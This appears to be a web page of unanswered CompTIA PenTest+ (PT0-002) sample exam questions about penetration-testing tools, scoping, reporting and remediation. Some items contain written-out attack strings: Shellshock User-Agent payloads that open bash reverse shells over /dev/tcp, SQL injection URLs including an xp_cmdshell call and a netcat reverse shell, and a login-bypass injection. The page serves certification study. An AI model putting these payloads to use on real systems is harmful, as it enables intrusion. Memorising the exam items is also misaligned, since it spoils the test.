Free PT0-002 Sample Questions — CompTIA PenTest+ Certification Exam

Which of the following components should a penetration tester most likely include in a report at the end of an assessment?

• A. Metrics and measures
• B. Client interviews
• C. Compliance information
• D. Business policies

A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?

• A. Netcraft
• B. CentralOps
• C. Responder
• D. FOCA

A penetration tester is testing a company's public APIs. In researching the API URLs, the penetration tester discovers that the URLs resolve to a cloud-hosted WAF service that is blocking the penetration tester's attack attempts. Which of the following should the tester do to best ensure the attacks will be more successful?

• A. Increase the volume of attacks to enable more to possibly slip through
• B. Vary the use of upper and lower case characters in payloads to fool the WAF
• C. Use multiple source IP addresses for the attack traffic to prevent being blocked
• D. Locate the company's servers that are hosting the API and send the traffic there

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

• A. The SSL certificates were invalid
• B. The tester IP was blocked
• C. The scanner crashed the system
• D. The web page was not found

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

• A. Prohibiting exploitation in the production environment
• B. Requiring all testers to review the scoping document carefully
• C. Never assessing the production networks
• D. Prohibiting testers from joining the team during the assessment

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

• A. PLCs will not act upon commands injected over the network
• B. Supervisors and controllers are on a separate virtual network by default
• C. Controllers will not validate the origin of commands
• D. Supervisory systems will detect a malicious injection of code/commands

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

• A. exploit = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml +xml,application/xml"}
• B. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml +xml,application/xml"}
• C. exploit = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml +xml,application/xml"}
• D. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1" "Accept": "text/ html,application/xhtml+xml,application/xml"}

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

• A. Changing to Wi-Fi equipment that supports strong encryption
• B. Using directional antennae
• C. Using WEP encryption
• D. Disabling Wi-Fi

A penetration tester is testing an Android application. Which of the following specialized tools would be best to use during the test?

• A. Burp Suite
• B. Drozer
• C. Ettercap
• D. Frida

A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server: x’ OR role LIKE '%admin% Which of the following should be recommended to remediate this vulnerability?

• A. Multifactor authentication
• B. Encrypted communications
• C. Secure software development life cycle
• D. Parameterized queries

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

• A. The tester had the situational awareness to stop the transfer
• B. The tester found evidence of prior compromise within the data set
• C. The tester completed the assigned part of the assessment workflow
• D. The tester reached the end of the assessment time frame

A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester MOST likely utilize?

• A. Wireshark
• B. Netcat
• C. Nmap
• D. Ettercap

A penetration tester discovered a new exploit and would like to create a Metasploit module. Which of the following programming languages would be best for the penetration tester to use?

• A. JavaScript
• B. Python
• C. Perl
• D. Ruby

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would best enable the tester to perform phishing in a later stage of the assessment?

• A. Test for RFC-defined protocol conformance
• B. Attempt to brute force authentication to the service
• C. Perform a reverse DNS query and match to the service banner
• D. Check for an open relay configuration

Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

• A. OWASP ZAP
• B. Nmap
• C. Nessus
• D. BeEF
• E. Hydra
• F. Burp Suite

A penetration tester is testing a client's infrastructure and discovers an API that provides information about the infrastructure that can be used to configure or manage the instances. The penetration tester uses this API to obtain temporary credentials used to access the infrastructure. Which of the following types of attacks did the penetration tester use?

• A. Direct-to-origin
• B. Side-channel
• C. Cloud malware injection
• D. Metadata service

While performing the scanning phase of a penetration test, the penetration tester runs the following command: nmap -n -vv -sV -p- 10.10.10.23-28 After the Nmap scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try NEXT?

• A. -sU
• B. -Pn
• C. -sn
• D. -sS

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog: http://company.com/catalog.asp?productid=22 The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes: http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05' Which of the following should the penetration tester attempt NEXT?

• A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
• B. http://company.com/catalog.asp?productid=22' OR 1=1 --
• C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --
• D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to define FIRST?

• A. Establish the format required by the client
• B. Establish the threshold of risk to escalate to the client immediately
• C. Establish the method of potential false positives
• D. Establish the preferred day of the week for reporting

Based on the information in a report from a web application scanner, a website is susceptible to clickjacking. Which of the following techniques would be best to use to prove this exploit?

• A. Capturing and replaying a session ID
• B. Redirecting the user with a CSRF
• C. Launching the website in an inline frame (iframe)
• D. Pulling server headers